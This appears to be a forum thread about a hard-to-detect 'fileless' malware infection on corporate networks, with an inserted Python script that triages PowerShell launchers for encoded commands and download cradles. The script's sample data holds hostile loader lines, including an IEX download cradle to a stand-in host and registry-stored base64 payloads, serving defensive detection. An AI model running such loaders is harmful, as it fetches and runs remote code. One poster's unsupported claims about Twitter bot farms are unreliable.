dunrambai

"Fileless" malware does leave artifacts. The artifacts are just not filesystem artifacts. The popular commodity malware poster is easy enough to figure out. I'd be interested if you actually have examples/evidence of bots performing Twitter, Facebook, or reddit manipulation.

senpaithatignoresyou

This is where it got interesting: the first place they went was "letsnecrypt.org", where it appears to have encrypted the traffic, and that is as far as we could tell.

I have no evidence of it going to the social media sites. If I did, I would have made a post in v/infosec. I just have a theory. IF there is a better way for them to make money off of generating site traffic, I would be very open to hearing that.

I have had this suspicion that Twitter may be behind the bot farms in China, in an attempt to hype up how much the service is used to dupe investors. Now that the cat is out of the bag, I would bet that they would try to find a subtle way to keep this sham going.

Then again, corporate cybersecurity is a massive inside joke. I have noticed that all the big accounting firms have begun this massive push to hire IT auditors, and the insurance companies have not too. I suspect that by next year, insurance cybersecurity audits are going to become the new pain in the ass for everyone.

bezzy

If malware is only in RAM then a simple reboot wipes it. Click farming malware is mostly used to generate ad revenue.

senpaithatignoresyou

Not in the RAM. This was also on a Unix machine, and on Windows 7 and 10 machines too.

MR_CHNYD

I don't understand how you are unaware of where it resides yet you have it detected. Are you very IT savvy or not so much? Any more info appreciated.

senpaithatignoresyou

I would wager I am about a 2 out of 10 with IT. I am not nearly as tech savvy as I want to be. The more I work with it, the more I realize it is incredibly complex. The scary bit is that none of the corporate people bother to learn the basics of how their expensive networks operate.

Part of why I don't have that many details on this is that I am not working directly with the people who are responding to it. This is stuff I have overheard.

bezzy

What endpoint detection vendor/product detected it?

senpaithatignoresyou

CrowdStrike

And if you want to enter a new world of creepy, that one would make 15 new topics here. IF your company uses it, **DON'T** work from home.

10233264?

As in DNC leaks—CrowdStrike?

bezzy

We don't.

bezzy

Fileless means in RAM. There is no other place for data to be. Either it's on disk, and therefore there are files, or it is not, and then it's in RAM. If data is not written to disk and does not exist in RAM, then where is it? In the cache? Search "fileless malware". It's all about existing in RAM and leveraging something like PS. The only way to achieve persistence across reboots is to write to a disk, at which point it isn't truly fileless.

WarGy

It could be in the CPU cache, couldn't it? There's also been a few cases of malware written into the BIOS flash memory.

bezzy

Perhaps, I don't know enough about CPUs. At any rate that would be a very tiny virus. If something is written to BIOS then it still is not fileless.

pisslam

My recommendation is to run Firefox or Brave in Firejail with AppArmor. If you set up Firejail with the overlay function, nothing is written to the disk and the program has no idea it has been jailed.

senpaithatignoresyou

This was on multiple corporate networks: on Unix AND Linux machines.

We think FIN7 made it, because the new diagnostic tools think it was installed around April-May, around the same time they were fucking with Chipotle and other companies.

dunrambai

Sounds like Kovter and not FIN7. Hashes, details, persistence mechanisms?

senpaithatignoresyou

From what I understand, in one instance it was running PowerShell scripts that it read off of a text file.

It also had scripts that worked on other operating systems in other text files as well.
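Two posts above make a point worth turning into a concrete check: bezzy's argument that anything which survives a reboot had to be written somewhere (a registry value, a scheduled task, a Run key), and the description here of PowerShell being fed a script body out of a plain text file. The script below is an added example written for this thread, not code from any poster or from CrowdStrike, and it does not claim to match whatever was found on the networks discussed. It takes constructed sample artifacts in the shape an endpoint collector might export (autostart registry values, scheduled-task actions, a process command line), decodes any `-EncodedCommand` blob, and flags the launcher traits that keep a script out of a `.ps1`: hidden window, profile suppression, execution-policy bypass, `Invoke-Expression`, download cradles, and script bodies read from a file or registry value. The rules and severities are illustrative heuristics of my own.

```python
"""Triage of the artifacts that "fileless" PowerShell tradecraft still leaves
on disk and in the registry.

Added example for this thread, not code from the thread.  SAMPLE_ARTIFACTS
below are CONSTRUCTED (source, value) pairs in the shape a collector exports;
the rules are illustrative heuristics, not any vendor's detection logic.
"""
import base64
import binascii
import re

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Each rule names one trait of a launcher whose real script is not a .ps1 on disk.
RULES = [
    ("exec_bypass",       re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I)),
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)),
    ("no_profile",        re.compile(r"-no(?:p|profile)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download_cradle",   re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)),
    ("script_from_store", re.compile(r"get-content|get-itemproperty|readalltext|frombase64string", re.I)),
]
HIGH = {"invoke_expression", "download_cradle", "encoded_command"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not decodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score(value):
    """Return (hits, decoded) for one launcher string, scoring the decoded script when present."""
    decoded = decode_encoded_command(value)
    hits = []
    text = value
    if decoded is not None:
        hits.append("encoded_command")
        # Replace the opaque base64 blob with the script it carries before matching rules.
        text = ENCODED_ARG.sub(lambda m: "-EncodedCommand " + decoded, value)
    hits += [name for name, rx in RULES if rx.search(text)]
    return hits, decoded


def severity(hits):
    """'high' if the launcher runs fetched or decoded code, 'medium' for two weak traits, 'low' for one."""
    if HIGH & set(hits):
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else None


def triage(artifacts):
    """Return one finding per artifact whose launcher matched at least one rule."""
    findings = []
    for source, value in artifacts:
        hits, decoded = score(value)
        sev = severity(hits)
        if sev is None:
            continue
        findings.append({"source": source, "severity": sev, "hits": hits, "decoded": decoded})
    return findings


# Constructed sample: a download cradle, encoded the way -EncodedCommand expects it.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
CRADLE_B64 = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed sample artifacts (not real collected data).
SAMPLE_ARTIFACTS = [
    # Ordinary autostart entry: a signed binary, no script host.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    # An admin's own scheduled script: one weak trait, not worth an alert by itself.
    (r"SchTask\Backup\Nightly",
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    # Run key whose script body lives in a plain .txt and is piped into Invoke-Expression.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc_upd",
     r'powershell.exe -nop -w hidden -c "Get-Content C:\ProgramData\sync.txt | Invoke-Expression"'),
    # Scheduled task carrying the whole cradle as an encoded command.
    (r"SchTask\Microsoft\Windows\Maint\Cleanup",
     "powershell.exe -NoProfile -NonInteractive -EncodedCommand " + CRADLE_B64),
    # Process command line that pulls a base64 payload out of a registry value.
    (r"proc\cmdline\pid4120",
     "powershell.exe -ep bypass -w 1 -c \"$p=(Get-ItemProperty 'HKCU:\\Software\\Classes\\z').d;"
     "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))\""),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ARTIFACTS):
        print(f["severity"].upper(), f["source"], ",".join(f["hits"]))
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

The point of scoring the decoded payload rather than the base64 blob is that the interesting strings (`IEX`, `DownloadString`) only exist after decoding; matching on the blob itself would miss them. Feeding this real data means exporting Run/RunOnce values, scheduled-task actions and process command lines from your own collector and passing them in as the same `(source, value)` pairs.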

Tancred

Easily discovered by monitoring traffic. Run Wireshark.

senpaithatignoresyou

NOPE.

Wireshark did not find it, nor did it show up in the Splunk logs, and Symantec did not find it, nor did the goddamn Indians or the SOC that they paid good money for.

It got found when we had two vendors put their endpoint protections up. One vendor found it (the most expensive one), the other did not.

They rolled out that endpoint protection on a few thousand more machines, and now it has found several more instances.

Tancred

How does it get by Wireshark?

senpaithatignoresyou

I do not know.

I am hoping that it is just corporate IT being inept or under-budgeted and under-staffed, and not something really nasty.

The problem is that it is not just the company I am at, but other people in other companies finding this. From what I understand there was an improvement in endpoint protection over the last few months to look for stuff like this, and now they are finding it.